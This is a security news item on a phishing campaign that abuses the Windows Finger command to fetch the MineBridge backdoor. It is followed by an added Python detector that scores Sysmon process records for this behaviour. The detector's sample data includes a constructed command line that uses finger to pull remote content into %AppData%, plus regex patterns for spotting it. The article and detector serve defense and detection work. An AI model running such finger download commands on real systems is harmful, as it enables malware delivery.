Windows Finger command abused by phishing to download malware
Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.
The deobfuscated command executed by the macro uses the finger command to download a Base64-encoded certificate from a remote server and saves it as %AppData%vUCooUr.
The certificate retrieved via the finger command is a Base64-encoded malware downloader executable.
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
As Finger is rarely used today, it is suggested that administrators block the Finger command on their network, whether through AppLocker or other methods.
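Where blocking is not yet in place, the behaviour described above can be hunted for in process-creation telemetry. The following Python is an added example, not part of the original article: it scores records for a finger query to a remote host, redirection of the response to a file, and an Office parent process. Field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage); the sample events, host names, weights and threshold are constructed assumptions.

```python
import re

# finger [-l] [user]@host, possibly embedded in a longer cmd.exe command line
FINGER_RE = re.compile(
    r'(?i)\bfinger(?:\.exe)?"?\s+(?:-l\s+)?[^\s@|>&]*@(?P<host>[^\s|>&"]+)')
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_THRESHOLD = 3  # assumed cut-off for this example

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def score_event(ev):
    """Score one process-creation record; returns (score, reasons)."""
    cmd = ev.get("CommandLine", "")
    m = FINGER_RE.search(cmd)
    if not m and basename(ev.get("Image", "")) != "finger.exe":
        return 0, []
    score, reasons = 1, ["finger client invoked"]
    if m:
        score += 1
        reasons.append("remote query to " + m.group("host"))
        # Redirection after the query means the response is written to disk.
        if re.search(r">{1,2}\s*\S", cmd[m.end():]):
            score += 1
            reasons.append("response redirected to a file")
    if basename(ev.get("ParentImage", "")) in OFFICE_PARENTS:
        score += 2
        reasons.append("spawned by an Office application")
    return score, reasons

def triage(events):
    """Return (score, reasons, event) tuples at or above the threshold."""
    hits = [(*score_event(ev), ev) for ev in events]
    return sorted((h for h in hits if h[0] >= ALERT_THRESHOLD), key=lambda h: -h[0])

# Constructed sample records (not taken from the campaign).
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    {"Image": SYS32 + "cmd.exe",
     "CommandLine": r"cmd.exe /c finger placeholder@198.51.100.7 > %AppData%\sample.tmp",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": SYS32 + "finger.exe", "CommandLine": "finger admin@intranet.example",
     "ParentImage": SYS32 + "cmd.exe"},
    {"Image": SYS32 + "notepad.exe", "CommandLine": "notepad.exe notes.txt",
     "ParentImage": SYS32 + "explorer.exe"},
]

if __name__ == "__main__":
    for score, reasons, ev in triage(SAMPLE_EVENTS):
        print(score, "; ".join(reasons), "|", ev["CommandLine"])
```

The redirection check is applied to the parent shell's command line because the `>` operator is handled by cmd.exe and does not appear in finger.exe's own arguments.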